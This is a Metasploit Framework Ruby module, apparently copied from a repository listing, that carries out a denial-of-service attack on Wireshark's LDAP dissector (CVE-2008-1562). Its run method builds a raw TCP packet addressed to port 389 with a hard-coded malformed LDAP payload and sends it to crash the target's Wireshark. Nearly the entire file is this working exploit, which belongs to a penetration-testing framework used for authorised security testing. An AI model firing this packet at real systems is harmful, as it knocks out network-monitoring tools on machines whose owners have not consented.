metasploit-framework/modules/auxiliary/dos/wireshark/ldap.rb

67 lines
1.5 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'scruby'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ip
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Wireshark LDAP dissector DOS',
'Description' => %q{
The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers
to cause a denial of service (application crash) via a malformed packet.
},
'Author' => ['MC'],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-1562' ],
],
'DisclosureDate' => 'Mar 28 2008')
end
def run
print_status("Sending malformed LDAP packet to #{rhost}")
m = Rex::Text.rand_text_alpha_lower(3)
connect_ip
pkt =(
Scruby::IP.new(
:dst => "#{rhost}",
:flags => 2,
:len => 121,
:ttl => 128,
:id => 0xba6b,
:chksum => 0x1e86
)/Scruby::TCP.new(
:dport => 389,
:seq => 1980536076,
:ack => 3945163501,
:window => 64833,
:chksum => 0xa8ce,
:flags => 18
)/"0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
).to_net
ip_write(pkt)
disconnect_ip
end
end